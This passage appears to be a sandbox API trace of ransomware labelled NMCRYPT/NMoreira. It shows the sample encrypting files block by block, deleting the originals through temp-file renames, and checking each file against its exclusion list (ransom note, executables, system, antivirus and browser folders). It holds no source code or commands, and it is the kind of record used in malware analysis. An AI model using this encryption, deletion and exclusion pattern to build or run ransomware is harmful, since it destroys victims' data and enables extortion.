nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.599] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.599] GetLastError () returned 0x0 [0144.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.600] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.600] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.600] GetLastError () returned 0x0 [0144.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.600] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.600] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.600] GetLastError () returned 0x0 [0144.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.600] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x20, lpOverlapped=0x0) returned 1 [0144.600] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x20, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x30) returned 1 [0144.600] GetLastError () returned 0x0 [0144.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x30, lpOverlapped=0x0) returned 1 [0144.600] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0144.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0144.600] CloseHandle (hObject=0x1624) returned 1 [0144.600] CloseHandle (hObject=0x588) returned 1 [0144.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat")) returned 0x20 [0144.601] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat", dwFileAttributes=0x20) returned 0 [0144.602] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 1 [0144.602] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat")) returned 0 [0144.609] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" [0144.609] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0144.609] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA7B3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa7b3.tmp")) returned 0xa7b3 [0144.609] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA7B3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa7b3.tmp"), dwFlags=0x1) returned 0 [0144.609] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA7B3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa7b3.tmp")) returned 1 [0144.610] CryptDestroyKey (hKey=0x9ad238) returned 1 [0144.610] wcslen (_String="OK") returned 0x2 [0144.610] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.610] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.610] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0144.610] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0144.610] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0144.610] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.610] wcscmp (_String1="HWRCustomization", _String2=".") returned 1 [0144.610] wcscmp (_String1="HWRCustomization", _String2="..") returned 1 [0144.610] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*NMCRYPT") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*Recovers your files.html") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*.exe") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*.dll") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*.lnk") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*.bat") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*.ini") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*.msi") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*.scf") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*pagefile.sys*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*NTUSER.DAT*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*AppData*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\winrar\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\Internet Explorer\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\java\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\TeamViewer\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\windows\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\ESET\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\AVG\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\AVIRA\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*\\AVAST Software\\*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*Atheros*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*Realtek*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*bootmgr*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*boot*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*boot*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*CONFIG.SYS*") returned 0 [0144.610] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*IO.SYS*") returned 0 [0144.611] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*MSDOS.SYS*") returned 0 [0144.611] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*NTDETECT.COM*") returned 0 [0144.611] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*ntldr*") returned 0 [0144.611] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*chrome*") returned 0 [0144.611] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*opera*") returned 0 [0144.611] PathMatchSpecW (pszFile="hwrenclm.dat", pszSpec="*firefox*") returned 0 [0144.611] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat", pszSpec="*") returned 1 [0144.611] strlen (_Str="NMoreira") returned 0x8 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 